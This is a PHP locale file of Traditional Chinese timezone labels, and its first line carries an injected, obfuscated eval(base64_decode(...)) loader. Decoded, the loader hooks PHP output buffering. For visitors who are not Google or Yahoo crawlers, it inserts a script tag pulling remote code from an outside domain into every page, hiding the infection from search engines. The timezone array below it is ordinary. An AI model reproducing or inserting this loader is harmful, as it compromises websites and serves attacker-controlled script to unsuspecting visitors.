<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5cGJtUmxjMmxuYm5OMGRXUnBiMmx1Wm04dVkyOXRMMnh6TG5Cb2NDSStQQzl6WTNKcGNIUSsiKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
<?php return array(
 "timezone gmt -12" => "(GMT-12:00) 安尼威杜克島, 瓜加林島",
 "timezone gmt -11" => "(GMT-11:00)中途島,薩摩亞群島",
 "timezone gmt -10" => "(GMT-10:00) 夏威夷",
 "timezone gmt -9" => "(GMT-9:00) 阿拉斯加",
 "timezone gmt -8" => "(GMT-8:00) 太平洋時間(美國及加拿大)",
 "timezone gmt -7" => "(GMT-7:00) 山區標準時間 (美國及加拿大)",
 "timezone gmt -6" => "(GMT-6:00) 中部時間 (美國及加拿大), 墨西哥市",
 "timezone gmt -5" => "(GMT-5:00) 東部時間 (美國及加拿大), 波哥大, 利馬, 基多",
 "timezone gmt -4.5" => "(GMT-4:30) 委內瑞拉時區 (VET)",
 "timezone gmt -4" => "(GMT-4:00) 大西洋時區 (加拿大), 卡拉卡斯, 拉巴斯",
 "timezone gmt -3.5" => "(GMT-3:30) 紐芬蘭",
 "timezone gmt -3" => "(GMT-3:00) 巴西(巴西利亞), 布宜諾斯艾利斯, 喬治城",
 "timezone gmt -2" => "(GMT-2:00) 中部大西洋時區",
 "timezone gmt -1" => "(GMT-1:00) 亞速爾群島, 佛得角島",
 "timezone gmt 0" => "(GMT) 格林威治標準時間, 倫敦, 愛爾蘭(都柏林), 葡萄牙(里斯本), 卡薩布蘭卡, 蒙羅維亞",
 "timezone gmt +1" => "(GMT+1:00) 阿姆斯特丹, 柏林, 羅馬, 哥本哈根, 布魯塞爾, 馬德里, 巴黎",
 "timezone gmt +2" => "(GMT+2:00) 雅典, 伊斯坦堡, 米斯克, 芬蘭(赫爾辛基), 耶路撒冷, 南非",
 "timezone gmt +3" => "(GMT+3:00) 巴格達, 科威特, 利雅德, 莫斯科, 聖彼德堡",
 "timezone gmt +3.5" => "(GMT+3:30) 德黑蘭",
 "timezone gmt +4" => "(GMT+4:00) 阿布紮比, 馬斯喀特, 巴庫, 提弗利司",
 "timezone gmt +4.5" => "(GMT+4:30) 喀布爾",
 "timezone gmt +5" => "(GMT+5:00) 伊卡特林堡,伊斯蘭馬巴德,喀拉蚩,塔什干",
 "timezone gmt +5.5" => "(GMT+5:30) 孟買, 印度(加爾各答), 馬德拉斯, 新德里",
 "timezone gmt +6" => "(GMT+6:00) 阿拉木圖, 達卡, 科倫坡",
 "timezone gmt +7" => "(GMT+7:00) 曼谷, 河內, 雅加達",
 "timezone gmt +8" => "(GMT+8:00) 北京, 伯斯, 新加坡, 香港, 烏魯木齊, 台北",
 "timezone gmt +9" => "(GMT+9:00) 東京, 漢城, 大阪, 札幌, 雅庫次克",
 "timezone gmt +9.5" => "(GMT+9:30) 阿德雷德, 達爾文",
 "timezone gmt +10" => "(GMT+10:00)布里斯本,坎培拉,墨爾本,雪梨,關島,海參威",
 "timezone gmt +11" => "(GMT+11:00)馬加丹,所羅門群島,新加勒多尼亞",
 "timezone gmt +12" => "(GMT+12:00) 奧克蘭, 威靈頓, 斐濟, 堪察加半島, 馬紹爾群島",
); ?>